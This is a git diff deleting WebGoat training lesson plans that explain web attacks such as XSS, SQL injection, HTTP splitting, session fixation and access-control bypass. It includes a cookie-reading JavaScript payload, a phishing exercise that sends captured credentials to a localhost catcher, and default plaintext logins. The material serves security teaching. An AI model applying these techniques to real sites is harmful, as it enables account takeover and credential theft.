-This lesson will familiarize the user with different encoding schemes. \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/FailOpenAuthentication.html b/src/main/webapp/lesson_plans/en/FailOpenAuthentication.html deleted file mode 100644 index 27a82e2cf..000000000 --- a/src/main/webapp/lesson_plans/en/FailOpenAuthentication.html +++ /dev/null @@ -1,10 +0,0 @@ -
-

Lesson Plan Title: How to Bypass Fail Open Authentication

-
- -

Concept / Topic To Teach:

- - This lesson presents the basics for understanding the "fail open" condition regarding authentication. The security term, “fail open” describes a behavior of a verification mechanism. This is when an error (i.e. unexpected exception) occurs during a verification method causing that method to evaluate to true. This is especially dangerous during login.
- -

General Goal(s):

- The user should be able to bypass the authentication check. \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/ForcedBrowsing.html b/src/main/webapp/lesson_plans/en/ForcedBrowsing.html deleted file mode 100644 index 2bf4fa6a4..000000000 --- a/src/main/webapp/lesson_plans/en/ForcedBrowsing.html +++ /dev/null @@ -1,21 +0,0 @@ -
-

Lesson Plan Title: How to Perform Forced Browsing Attacks.

-
- -

Concept / Topic To Teach:

-How to Exploit Forced Browsing. -
-
-

-How the attacks works: -

-Forced browsing is a technique used by attackers to gain access to resources that are not referenced, but are nevertheless accessible. - -One technique is to manipulate the URL in the browser by deleting sections from the end until an unprotected directory is found -
-

General Goal(s):

- -* Your goal should be to try to guess the URL for the "config" interface.
-* The "config" URL is only available to the maintenance personnel.
-* The application doesn't check for horizontal privileges. - diff --git a/src/main/webapp/lesson_plans/en/ForgotPassword.html b/src/main/webapp/lesson_plans/en/ForgotPassword.html deleted file mode 100644 index 06b2feb2f..000000000 --- a/src/main/webapp/lesson_plans/en/ForgotPassword.html +++ /dev/null @@ -1,9 +0,0 @@ -
-

Lesson Plan Title: How to Exploit the Forgot Password Page

-
-

Concept / Topic To Teach:

- -Web applications frequently provide their users the ability to retrieve a forgotten password. Unfortunately, many web applications fail to implement the mechanism properly. The information required to verify the identity of the user is often overly simplistic. -

General Goal(s):

-Users can retrieve their password if they can answer the secret question properly. There is no lock-out mechanism on this 'Forgot Password' page. Your username is 'webgoat' and your favorite color is 'red'. The goal is to retrieve the password of another user. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/HiddenFieldTampering.html b/src/main/webapp/lesson_plans/en/HiddenFieldTampering.html deleted file mode 100644 index dff0d945e..000000000 --- a/src/main/webapp/lesson_plans/en/HiddenFieldTampering.html +++ /dev/null @@ -1,12 +0,0 @@ -
-

Lesson Plan Title: How to Exploit Hidden Fields

-
-

Concept / Topic To Teach:

- -Developers will use hidden fields for tracking, login, pricing, etc.. information on a loaded page. While this is a convenient and easy mechanism for the developer, they often don't validate the information that is received from the hidden field. This lesson will teach the attacker to find and modify hidden fields to obtain a product for a price other than the price specified
- -

General Goal(s):

-The user should be able to exploit a hidden field to obtain a product at an incorrect price. - -Try to purchase the HDTV for less than the purchase price, if you have not done so already. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/HowToWork.html b/src/main/webapp/lesson_plans/en/HowToWork.html deleted file mode 100644 index d99f61dc2..000000000 --- a/src/main/webapp/lesson_plans/en/HowToWork.html +++ /dev/null @@ -1,68 +0,0 @@ - -

How To Work With WebGoat

-

-Welcome to a brief overview of WebGoat.
-

-

Environment Information

-

-WebGoat uses the Apache Tomcat server but can run in any application server. It is configured to run on -localhost although this can be easily changed, see the "Tomcat Configuration" section in the Introduction.

- -

The WebGoat Interface

-

-

-1. Lesson Categories in WebGoat. Click on a Category to see specific Lessons.
-2. This will show the underlying Java source code.
-3. This will show the complete solution of the selected lesson.
-4. This will show goals and objectives of the lesson.
-5. This will show technical hints to solve the lesson.
-6. This shows the HTTP request data
-7. If you want to restart a lesson you can use this link.

-

Solve The Lesson

-

-Always start with the lesson plan. Then try to solve the lesson and if necessary, -use the hints. The last hint is the solution text if applicable. If you cannot solve the lesson using the hints, you may view the -solution for complete details.

- -

Read And Edit Parameters/Cookies

-

-To read and edit parameters and cookies you need a local proxy like OWASP ZAP to intercept the HTTP request. - More information on ZAP can be found in the "Useful Tools" section in the Introduction. -

- -

Configuring new WebGoat users

-

-WebGoat uses spring-security.xml to configure users. -
-

-<!-- Authentication Manager -->
-<authentication-manager alias="authenticationManager">
-  <authentication-provider>
-    <user-service>
-      <user name="guest" password="guest" authorities="ROLE_WEBGOAT_USER" />
-      <user name="webgoat" password="webgoat" authorities="ROLE_WEBGOAT_ADMIN" />
-      <user name="server" password="server" authorities="ROLE_SERVER_ADMIN" />
-    </user-service>
-  </authentication-provider>
-</authentication-manager>  
-  
-

-

Adding Users

-

-Usually WebGoat only requires logging in with the user:guest and password:guest. - But maybe in laboratory you have made a setup with one server and a lot of -clients. In this case you might want to have a user for every client, - you will have to alter /WEB-INF/spring-security.xml to add additional users. We recommend not to use real passwords -as the passwords are stored in plain text in this file! -

-

Adding a new User

-

-Adding a user is straight forward. You can use the guest entry as an example. The added -users should have the same role as the guest user. The new user/password will not show on the login page. -Add lines like this to the /WEB-INF/spring-security.xml file: -

-
-<user name="guest2" password="guest2" authorities="ROLE_WEBGOAT_USER" />
-...
-
- diff --git a/src/main/webapp/lesson_plans/en/HtmlClues.html b/src/main/webapp/lesson_plans/en/HtmlClues.html deleted file mode 100644 index c0d81446c..000000000 --- a/src/main/webapp/lesson_plans/en/HtmlClues.html +++ /dev/null @@ -1,12 +0,0 @@ -
-

Lesson Plan Title: How to Discover Clues in the HTML

-
- -

Concept / Topic To Teach:

- - Developers are notorious for leaving statements like FIXME's, TODO's, Code Broken, Hack, etc... inside the source code.  Review the source code for any comments denoting  passwords, backdoors, or something doesn't work right.  - Below is an example of a forms based authentication form. Look for clues to help you log in. - -
-

General Goal(s):

-The user should be able to bypass the authentication check. diff --git a/src/main/webapp/lesson_plans/en/HttpBasics.html b/src/main/webapp/lesson_plans/en/HttpBasics.html deleted file mode 100644 index f3321f295..000000000 --- a/src/main/webapp/lesson_plans/en/HttpBasics.html +++ /dev/null @@ -1,27 +0,0 @@ -
-

Lesson Plan Title: Http Basics

-
- -

Concept / Topic To Teach:

- This lesson presents the basics for understanding the transfer of data between the browser and the web application.
-
-

-How HTTP works: -

-All HTTP transactions follow the same general format. Each client request and server response has three parts: the request or response line, a header section and the entity body. The client initiates a transaction as follows:
-
- The client contacts the server and sends a document request
-
-
-
    GET /index.html?param=value HTTP/1.0
- Next, the client sends optional header information to inform the server of its configuration and the document formats it will accept.
-
-
    User-Agent: Mozilla/4.06 Accept: image/gif,image/jpeg, */*
-After sending the request and headers, the client may send additional data. This data is mostly used by CGI programs using the POST method.
-

General Goal(s):

- -Enter your name in the input field below and press "Go!" to submit. The server will accept the request, reverse the input and display it back to the user, illustrating the basics of handling an HTTP request. -

-The user should become familiar with the features of WebGoat by manipulating the above -buttons to view hints, show the HTTP request parameters, the HTTP request cookies, and the Java source code. You may also try using OWASP Zed Attack Proxy for the first time. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/HttpOnly.html b/src/main/webapp/lesson_plans/en/HttpOnly.html deleted file mode 100644 index aea12470c..000000000 --- a/src/main/webapp/lesson_plans/en/HttpOnly.html +++ /dev/null @@ -1,26 +0,0 @@ -
-

Lesson Plan Title: HttpOnly Test

-
-

Concept / Topic To Teach:

- -To help mitigate the cross site scripting threat, Microsoft has -introduced a new cookie attribute entitled 'HttpOnly.' If this flag is -set, then the browser should not allow client-side script to access the -cookie. Since the attribute is relatively new, several browsers neglect -to handle the new attribute properly. -

For a list of supported browsers see: OWASP HTTPOnly Support -

General Goal(s):

-The purpose of this lesson is to test whether your browser supports the -HTTPOnly cookie flag. Note the value of the -unique2u -cookie. If your browser supports HTTPOnly, and you enable it for a -cookie, client side code should NOT be able to read OR write to that -cookie, but the browser can still send its value to the server. Some -browsers only prevent client side read access, but don't prevent write -access. -
-
-With the HTTPOnly attribute turned on, type -"javascript:alert(document.cookie)" in the browser address bar. Notice -all cookies are displayed except the unique2u cookie. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/HttpSplitting.html b/src/main/webapp/lesson_plans/en/HttpSplitting.html deleted file mode 100644 index ac0906a93..000000000 --- a/src/main/webapp/lesson_plans/en/HttpSplitting.html +++ /dev/null @@ -1,34 +0,0 @@ -
-

Lesson Plan Title: How to Perform HTTP Splitting

-
- -

Concept / Topic To Teach:

- This lesson teaches how to perform HTTP Splitting attacks. -
-
-

-How the attack works: -

-

The attacker passes malicious code to the web server together with normal input. -A victim application will not be checking for CR (carriage return, also given by %0d or \r) -and LF (line feed, also given by %0a or \n) characters. These characters not only give attackers control -of the remaining headers and body of the response the application intends to send, -but they also allows them to create additional responses entirely under their control.

-

The effect of an HTTP Splitting attack is maximized when accompanied with a Cache Poisoning. The goal of -Cache Poisoning attack is to poison the cache of the victim by fooling the cache into believing that the page -hijacked using the HTTP splitting is an authentic version of the server's copy.

-

The attack works by using the HTTP Splitting attack plus adding the Last-Modified: header and setting it -to a future date. This forces the browser to send an incorrect If-Modified-Since request header on future requests. -Because of this, the server will always report that the (poisoned) page has not changed, and the victim's browser -will continue to display the attacked version of the page.

-

A sample of a 304 response is: -

HTTP/1.1 304 Not Modified
-Date: Fri, 30 Dec 2005 17:32:47 GMT
-

-
-

General Goal(s):

- -

This lesson has two stages. Stage 1 teaches you how to do HTTP Splitting attacks while stage 2 builds on that to teach you how to elevate HTTP Splitting to Cache Poisoning.

-

Enter a language for the system to search by. You will notice that the application is redirecting your request to another resource on the server. You should be able to use the CR (%0d) and LF (%0a) characters to exploit the attack. Your goal should be to force the server to send a 200 OK. If the screen changed as an effect to your attack, just go back to the homepage. After stage 2 is exploited successfully, you will find the green check in the left menu.

- - diff --git a/src/main/webapp/lesson_plans/en/InsecureLogin.html b/src/main/webapp/lesson_plans/en/InsecureLogin.html deleted file mode 100644 index a33256309..000000000 --- a/src/main/webapp/lesson_plans/en/InsecureLogin.html +++ /dev/null @@ -1,14 +0,0 @@ -
-

Lesson Plan Title: Insecure Login

-
-

Concept / Topic To Teach:

- -Sensitive data should never sent in plaintext! Often applications -switch to a secure connection after the authorization. An attacker -could just sniff the login and use the gathered information to -break into an account. A good webapplication always takes care of -encrypting sensitive data. -

General Goal(s):

-See how easy it is to sniff a password in plaintext.
-Understand the advantages of encrypting the login data! - diff --git a/src/main/webapp/lesson_plans/en/JSONInjection.html b/src/main/webapp/lesson_plans/en/JSONInjection.html deleted file mode 100644 index 4c72bd04f..000000000 --- a/src/main/webapp/lesson_plans/en/JSONInjection.html +++ /dev/null @@ -1,24 +0,0 @@ -
-

Lesson Plan Title: How to Perform JSON Injection

-
- -

Concept / Topic To Teach:

-This lesson teaches how to perform JSON Injection Attacks. -
-
-

-How the attacks works: -

-JavaScript Object Notation (JSON) is a simple and effective lightweight data exchange format. JSON can be in a lot of forms such as arrays, lists, hashtables and other data structures. -JSON is widely used in AJAX and Web2.0 application and is favored by programmers over XML because of its ease of use and speed. -However, JSON, like XML is prone to Injection attacks. A malicious attacker can inject the reply from the server and inject some arbitrary values in there. - -
-

General Goal(s):

- -* You are traveling from Boston, MA- Airport code BOS to Seattle, WA - Airport code SEA.
-* Once you enter the three digit code of the airport, an AJAX request will be executed asking for the ticket price.
-* You will notice that there are two flights available, an expensive one with no stops and another cheaper one with 2 stops.
-* Your goal is to try to get the one with no stops but for a cheaper price. - - diff --git a/src/main/webapp/lesson_plans/en/JavaScriptValidation.html b/src/main/webapp/lesson_plans/en/JavaScriptValidation.html deleted file mode 100644 index 7819de2bf..000000000 --- a/src/main/webapp/lesson_plans/en/JavaScriptValidation.html +++ /dev/null @@ -1,14 +0,0 @@ -
-

Lesson Plan Title: How to Bypass Client Side JavaScript Validation

-
-

Concept / Topic To Teach:

- -Client-side validation should not be considered a secure means of validating parameters. These validations only help reduce the amount of server processing time for normal users who do not know the format of required input. Attackers can bypass these mechanisms easily in various ways. Any client-side validation should be duplicated on the server side. This will greatly reduce the likelihood of insecure parameter values being used in the application. - -
-

General Goal(s):

-For this exercise, the web site requires that you follow certain rules when you fill out a form. The user should be able to break those rules, and send the website input that it wasn't expecting.
- -This website performs both client and server side validation. For this exercise, your job is to break the client side validation and send the - website input that it wasn't expecting. You must break all 7 validators at the same time. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/Lesson_Plan_Template.html b/src/main/webapp/lesson_plans/en/Lesson_Plan_Template.html deleted file mode 100644 index 66293a95c..000000000 --- a/src/main/webapp/lesson_plans/en/Lesson_Plan_Template.html +++ /dev/null @@ -1,17 +0,0 @@ -
-

Lesson Plan Title:

-
- -

Concept / Topic To Teach:

-

Standards Addressed:

-

General Goal(s):

-

Specific Objectives:

-

Required Materials:

-

Anticipatory Set (Lead-In):

-

Step-By-Step Procedures:

-

Plan For Independent Practice:

-

Closure (Reflect Anticipatory Set):

-

Assessment Based On Objectives:

-

Extensions (For Gifted Students):

-

Possible Connections To Other Subjects:

- \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/LogSpoofing.html b/src/main/webapp/lesson_plans/en/LogSpoofing.html deleted file mode 100644 index 105e38f54..000000000 --- a/src/main/webapp/lesson_plans/en/LogSpoofing.html +++ /dev/null @@ -1,20 +0,0 @@ -
-

Lesson Plan Title: How to Perform Log Spoofing.

-
- -

Concept / Topic To Teach:

- This lesson teaches attempts to fool the human eye. -
-
-

-How the attacks works: -The attack is based on fooling the humane eye in log files. An attacker can erase his traces from the logs -using this attack. -

-
-

General Goal(s):

- -* The grey area below represents what is going to be logged in the web server's log file.
-* Your goal is to make it like a username "admin" has succeeded into logging in.
-* Elevate your attack by adding a script to the log file. - diff --git a/src/main/webapp/lesson_plans/en/MultiLevelLogin1.html b/src/main/webapp/lesson_plans/en/MultiLevelLogin1.html deleted file mode 100644 index b5bd6118d..000000000 --- a/src/main/webapp/lesson_plans/en/MultiLevelLogin1.html +++ /dev/null @@ -1,20 +0,0 @@ -
-

Lesson Plan Title: Multi Level Login 1

-
-

Concept / Topic To Teach:

- -A Multi Level Login should provide a strong authentication. -This is archived by adding a second layer. After having -logged in with your user name and password you are asked -for a 'Transaction Authentication Number' (TAN). This is -often used by online banking. You get a list with a lots -of TANs generated only for you by the bank. Each TAN is used only once. -Another method is to provide the TAN by SMS. This has -the advantage that an attacker can not get TANs provided -by the user. -

General Goal(s):

-In this Lesson you try to get around the strong authentication. -You have to break into another account. The user name, password and a -already used TAN is provided. You have to make sure -the server accept the TAN even it is already used. - diff --git a/src/main/webapp/lesson_plans/en/MultiLevelLogin2.html b/src/main/webapp/lesson_plans/en/MultiLevelLogin2.html deleted file mode 100644 index 3514b7148..000000000 --- a/src/main/webapp/lesson_plans/en/MultiLevelLogin2.html +++ /dev/null @@ -1,20 +0,0 @@ -
-

Lesson Plan Title: Multi Level Login 2

-
-

Concept / Topic To Teach:

- -A Multi Level Login should provide a strong authentication. -This is archived by adding a second layer. After having -logged in with your user name and password you are asked -for a 'Transaction Authentication Number' (TAN). This is -often used by online banking. You get a list with a lots -of TANs generated only for you by the bank. Each TAN is used only once. -Another method is to provide the TAN by SMS. This has -the advantage that an attacker can not get TANs provided -by the user. -

General Goal(s):

-In this lesson you have to try to break into another account. -You have an own account for WebGoat Financial but you want to -log into another account only knowing the user name of the victim -to attack. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/NewLesson.html b/src/main/webapp/lesson_plans/en/NewLesson.html deleted file mode 100644 index 234b170d8..000000000 --- a/src/main/webapp/lesson_plans/en/NewLesson.html +++ /dev/null @@ -1,13 +0,0 @@ - - -

Create A WebGoat Lesson

-

-Adding lessons to WebGoat is very easy. If you have an idea that would be suitable
-for a new lesson, follow these few simple instructions to implement it:

-* Download the source code from here.

-* Setup framework: follow the simple instructions in "HOW TO create the WebGoat workspace.txt" that comes with the project.

-* You need to add two files for each new lesson:
-  - YourLesson.java to org.owasp.webgoat.lessons
-  - YourLesson.html to WebContent/lesson_plans

- - diff --git a/src/main/webapp/lesson_plans/en/OffByOne.html b/src/main/webapp/lesson_plans/en/OffByOne.html deleted file mode 100644 index b35b95996..000000000 --- a/src/main/webapp/lesson_plans/en/OffByOne.html +++ /dev/null @@ -1,21 +0,0 @@ -
-

Lesson Plan Title: How to Exploit "Off-by-One" Buffer Overflow Vulnerabilities

-
-

Concept / Topic To Teach:

-How to Exploit a Web Based "Off-by-One" Buffer Overflow. -
-
-

How the attack works: -

-Despite being more rare, buffer overflow vulnerabilities on the web occur when a tier of the application has insufficient memory allocated to deal with the data submitted by the user. Typically, such a tier would be written in C or a similar language. - -For the particular subset, namely, off-by-one overflows, this lesson focuses on the consequences of being able to overwrite the position for the trailing null byte. - -As a result, further information is returned back to the user, due to the fact that no null byte was found. -
-

Lesson Goal(s):

- -

Welcome to the OWASP Hotel! Can you find out which room a VIP guest is staying in?

- -* Understand how a buffer overflow vulnerability can be triggered on a web application.
-* Understand what type of value lengths are likely to trigger a buffer overflow.
\ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/PasswordStrength.html b/src/main/webapp/lesson_plans/en/PasswordStrength.html deleted file mode 100644 index f700fb8fd..000000000 --- a/src/main/webapp/lesson_plans/en/PasswordStrength.html +++ /dev/null @@ -1,11 +0,0 @@ -
-

Lesson Plan Title: Password Strength

-
-

Concept / Topic To Teach:

- -Accounts are only as secure as their passwords. Most users have the same weak password everywhere. If you want to protect them against brute-force-attacks your application should have good requirements for passwords. The password should contain lower case letters, capitals, numbers and special characters. The longer the password, the better, consider using a passphrase instead. For -more information see: OWASP proper password strength. - -

-

General Goal(s):

- For this exercise, your job is to test several passwords on https://howsecureismypassword.net/ \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/PathBasedAccessControl.html b/src/main/webapp/lesson_plans/en/PathBasedAccessControl.html deleted file mode 100644 index 235bd2528..000000000 --- a/src/main/webapp/lesson_plans/en/PathBasedAccessControl.html +++ /dev/null @@ -1,9 +0,0 @@ -
-

Lesson Plan Title: How to Bypass a Path Based Access Control Scheme

-
-

Concept / Topic To Teach:

- -In a path based access control scheme, an attacker can traverse a path by providing relative path information. Therefore an attacker can use relative paths to access files that normally are not directly accessible by anyone, or would otherwise be denied if requested directly. - -

General Goal(s):

-The user should be able to access a file that is not in the listed directory. \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/Phishing.html b/src/main/webapp/lesson_plans/en/Phishing.html deleted file mode 100644 index 9b0127d14..000000000 --- a/src/main/webapp/lesson_plans/en/Phishing.html +++ /dev/null @@ -1,16 +0,0 @@ -
-

Lesson Plan Title: Phishing with XSS

-
-

Concept / Topic To Teach:

- -It is always a good practice to validate all input on the server side. - XSS can occur when unvalidated user input is used in an HTTP response. - With the help of XSS you can do a Phishing Attack and add content to a page - which looks official. It is very hard for a victim to determinate - that the content is malicious. - -

General Goal(s):

-The user should be able to add a form asking for username -and password. On submit the input should be sent -to http://localhost/WebGoat/catcher?PROPERTY=yes &user=catchedUserName&password=catchedPasswordName - diff --git a/src/main/webapp/lesson_plans/en/ReflectedXSS.html b/src/main/webapp/lesson_plans/en/ReflectedXSS.html deleted file mode 100644 index 9db959e07..000000000 --- a/src/main/webapp/lesson_plans/en/ReflectedXSS.html +++ /dev/null @@ -1,13 +0,0 @@ -
-

Lesson Plan Title: How to Perform Reflected Cross Site Scripting (XSS)

-
-

Concept / Topic To Teach:

- -It is always a good practice to validate all input on the server side. - XSS can occur when unvalidated user input is used in an HTTP response. - In a reflected XSS attack, an attacker can craft a URL with the attack - script and post it to another website, email it, or otherwise get a - victim to click on it. - -

General Goal(s):

-For this exercise, your mission is to come up with some input containing a script. You have to try to get this page to reflect that input back to your browser, which will execute the script and do something bad. \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/RemoteAdminFlaw.html b/src/main/webapp/lesson_plans/en/RemoteAdminFlaw.html deleted file mode 100644 index e852cbcba..000000000 --- a/src/main/webapp/lesson_plans/en/RemoteAdminFlaw.html +++ /dev/null @@ -1,11 +0,0 @@ -
-

Lesson Plan Title: How to Force Browser Web Resources

-
-

Concept / Topic To Teach:

-Applications will often have an administrative interface that allows privileged users access to functionality that normal users shouldn't see. The application server will often have an admin interface as well. -

Standards Addressed :

-

General Goal(s): - -Try to access the administrative interface for WebGoat. You may also try to access the administrative interface for Tomcat. The Tomcat admin interface can be accessed via a URL (/admin) and will not count towards the completion of this lesson. - -

diff --git a/src/main/webapp/lesson_plans/en/RoleBasedAccessControl.html b/src/main/webapp/lesson_plans/en/RoleBasedAccessControl.html deleted file mode 100644 index 132dc235f..000000000 --- a/src/main/webapp/lesson_plans/en/RoleBasedAccessControl.html +++ /dev/null @@ -1,15 +0,0 @@ -
-

Lesson Plan Title: Role Based Access Control

-
-

Concept / Topic To Teach:

- -In role-based access control scheme, a role represents a set of access permissions and privileges. A user can be assigned one or more roles. A role-based access control normally consists of two parts: role permission management and role assignment. A broken role-based access control scheme might allow a user to perform accesses that are not allowed by his/her assigned roles, or somehow obtain unauthorized roles. - -

General Goal(s):

-Your goal is to explore the access control rules that govern this site. Each role has permission to certain resources (A-F). Each user is assigned one or more roles. Only the user with the [Admin] role should have access to the 'F' resources. In a successful attack, a user doesn't have the [Admin] role can access resource F. -

Lesson Resources:

-Org Chart -
-Access Control Matrix -
-Database Schema diff --git a/src/main/webapp/lesson_plans/en/SQLInjection.html b/src/main/webapp/lesson_plans/en/SQLInjection.html deleted file mode 100644 index 95f4ae304..000000000 --- a/src/main/webapp/lesson_plans/en/SQLInjection.html +++ /dev/null @@ -1,14 +0,0 @@ -
-

Lesson Plan Title: How to Perform a SQL Injection

-
- -

Concept / Topic To Teach:

- -SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack. -

-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queiries, even if the threat of SQL injection has been prevented in some other manner.
-

General Goal(s):

-For this exercise, you will perform SQLInjection attacks. You will also implement code changes in the web application to defeat these attacks. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/SameOriginPolicyProtection.html b/src/main/webapp/lesson_plans/en/SameOriginPolicyProtection.html deleted file mode 100644 index b7db5d10e..000000000 --- a/src/main/webapp/lesson_plans/en/SameOriginPolicyProtection.html +++ /dev/null @@ -1,13 +0,0 @@ -
-

Lesson Plan Title: Same Origin Policy Protection

-
-

Concept / Topic To Teach:

- -A key element of AJAX is the XMLHttpRequest (XHR), which allows javascript to make asynchronous -calls from the client side to a server. However, as a security measure these requests may -only be made to the server from which the client page originated. - -

General Goal(s):

-This exercise demonstrates the Same Origin Policy Protection. XHR requests -can only be passed back to the originating server. Attempts to pass data to -a non-originating server will fail."; diff --git a/src/main/webapp/lesson_plans/en/SessionFixation.html b/src/main/webapp/lesson_plans/en/SessionFixation.html deleted file mode 100644 index c7e70f3aa..000000000 --- a/src/main/webapp/lesson_plans/en/SessionFixation.html +++ /dev/null @@ -1,33 +0,0 @@ -
-

Lesson Plan Title: Session Fixation

-
- -

Concept / Topic To Teach:

-How to steal a session with a 'Session Fixation' -
-
-

-How the attacks works: -

-A user is recognized by the server by an unique Session ID. If a -user has logged in and is authorized he does not have to -reauthorize when he revisits the application as the user is recognized -by the Session ID. In some applications it is possible to deliver -the Session ID in the Get-Request. Here is where the attack starts. -

-An attacker can send a hyperlink to a victim with a chosen Session ID. -This can be done for example by a prepared mail which looks like an -official mail from the application administrator. -If the victim clicks on the link and logs in he is authorized -by the Session ID the attacker has chosen. The attacker -can visit the page with the same ID and is recognized as the victim and -gets logged in without authorization. -
-

General Goal(s):

- -This lesson has several stages. You play the attacker but also the victim. -After having done this lesson it should be understood how -a Session Fixation in general works. It should be also understood that -it is a bad idea to use the Get-Request for Session IDs. - - diff --git a/src/main/webapp/lesson_plans/en/SilentTransactions.html b/src/main/webapp/lesson_plans/en/SilentTransactions.html deleted file mode 100644 index d3377dce8..000000000 --- a/src/main/webapp/lesson_plans/en/SilentTransactions.html +++ /dev/null @@ -1,24 +0,0 @@ -
-

Lesson Plan Title: How to Perform Silent Transactions Attacks.

-
- -

Concept / Topic To Teach:

-This lesson teaches how to perform silent transactions attacks. -
-
-

-How the attacks works: -

-Any system that silently processes transactions using a single submission is dangerous to the client. -For example, if a normal web application allows a simple URL submission, a preset session attack will -allow the attacker to complete a transaction without the user’s authorization. -In Ajax, it gets worse: the transaction is silent; it happens with no user feedback on the page, -so an injected attack script may be able to steal money from the client without authorization.
-
-

General Goal(s):

- -* This is a sample internet banking application - money transfer page.
-* It shows below your balance, the account you are transferring to and amount you will transfer.
-* The application uses AJAX to submit the transaction after doing some basic client side validations.
-* Your goal is to try to bypass the user's authorization and silently execute the transaction.
- diff --git a/src/main/webapp/lesson_plans/en/SoapRequest.html b/src/main/webapp/lesson_plans/en/SoapRequest.html deleted file mode 100644 index b96226617..000000000 --- a/src/main/webapp/lesson_plans/en/SoapRequest.html +++ /dev/null @@ -1,9 +0,0 @@ -
-

Lesson Plan Title: How to Create a SOAP Request

-
-

Concept / Topic To Teach:

- -Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL). Let's learn something about WSDL files. Check out WebGoat's web service description language (WSDL) file. -

General Goal(s):

-Try connecting to the WSDL with a browser or Web Service tool. The URL for the web service is: http://localhost/WebGoat/services/SoapRequest The WSDL can usually be viewed by adding a ?WSDL on the end of the web service request. You must access 2 of the operations to pass this lesson. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/SqlNumericInjection.html b/src/main/webapp/lesson_plans/en/SqlNumericInjection.html deleted file mode 100644 index a081c1a29..000000000 --- a/src/main/webapp/lesson_plans/en/SqlNumericInjection.html +++ /dev/null @@ -1,14 +0,0 @@ -
-

Lesson Plan Title: How to Perform Numeric SQL Injection

-
- -

Concept / Topic To Teach:

- -SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack. -

-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.
-

General Goal(s):

-The form below allows a user to view weather data. Try to inject an SQL string that results in all the weather data being displayed. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/StoredXss.html b/src/main/webapp/lesson_plans/en/StoredXss.html deleted file mode 100644 index e2662164f..000000000 --- a/src/main/webapp/lesson_plans/en/StoredXss.html +++ /dev/null @@ -1,9 +0,0 @@ -
-

Lesson Plan Title: How to Perform Stored Cross Site Scripting (XSS)

-
-

Concept / Topic To Teach:

- -It is always a good practice to scrub all input, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere in the application. Users should not be able to create message content that could cause another user to load an undesireable page or undesireable content when the user's message is retrieved. - -

General Goal(s):

-The user should be able to add message content that cause another user to load an undesireable page or content. \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/en/ThreadSafetyProblem.html b/src/main/webapp/lesson_plans/en/ThreadSafetyProblem.html deleted file mode 100644 index 1b01a915d..000000000 --- a/src/main/webapp/lesson_plans/en/ThreadSafetyProblem.html +++ /dev/null @@ -1,22 +0,0 @@ - - - - - - Lesson Plan - - - -
-

Lesson Plan Title: How to Exploit Thread Safety Problems

-
- -

Concept / Topic To Teach:

- - Web applications can handle many HTTP requests simultaneously. Developers often use variables that are not thread safe.  Thread safety means that the fields of an object or class always maintain a valid state when used concurrently by multiple threads. It is often possible to exploit a concurrency bug by loading the same page as another user at the exact same time. Because all threads share the same method area, and the method area is where all class variables are stored, multiple threads can attempt to use the same class variables concurrently.
- -

General Goal(s):

-The user should be able to exploit the concurrency error in the web application and view login information for another user that is attempting the same function at the same time. This will require the use of two browsers. -
- - diff --git a/src/main/webapp/lesson_plans/en/TomcatSetup.html b/src/main/webapp/lesson_plans/en/TomcatSetup.html deleted file mode 100644 index decbd49df..000000000 --- a/src/main/webapp/lesson_plans/en/TomcatSetup.html +++ /dev/null @@ -1,80 +0,0 @@ - -

How To Configure Tomcat



-

Introduction

-

WebGoat comes with default configurations for Tomcat. This page will explain these configurations -and other possible configurations for Tomcat. This is just -a short description which should be enough in most cases. For more advanced tasks please -refer to the Tomcat documentation. Please note that all solutions -are written for the standard configurations on port 80 or 8080. If you use another port you have -to adjust the solution to your configuration.

- -

The Standard Configurations

-

WebGoat has multiple ways of being run. The -WebGoat Wiki is the best place to find the latest configuration instructions. -By default WebGoat will run on port 8080. In the basic configurations you use the server on your localhost. -In Linux you have to start WebGoat as root or with sudo if you want to run it on port 80 and - 443. Running software as root is dangerous we strongly advice to use -the port 8080 and 8443. -

- -

Server Configurations

-

-If you are a single user of WebGoat the standard configurations should be -enough but if you want to use WebGoat in laboratory or in class there -might be the need to change the configurations. Before changing -the configurations we recommend doing a backup of the files you change. -

- -

Change Ports

-

-To change the ports open Tomcat's server.xml which you find in tomcat/conf and change the -non-SSL port. If you want to change your -Tomcat server to use it on port 8079 for example: -

- -
-<!-- Define a non-SSL HTTP/1.1 Connector on port 8079 --> 
-<Connector address="127.0.0.1" port="8079"...
-
-

-You can also change the SSL connector to another port of course. -In this example to port 8442: -

-
-<!-- Define a SSL HTTP/1.1 Connector on port 8442 --> 
-<Connector address="127.0.0.1" port="8442"... 
-
-

-You can also modify WebGoat's pom.xml file to change the port. You will need to modify -the tomcat7-maven-plugin plugin configuration. -

-
- -

Make WebGoat Reachable From Another Client

-

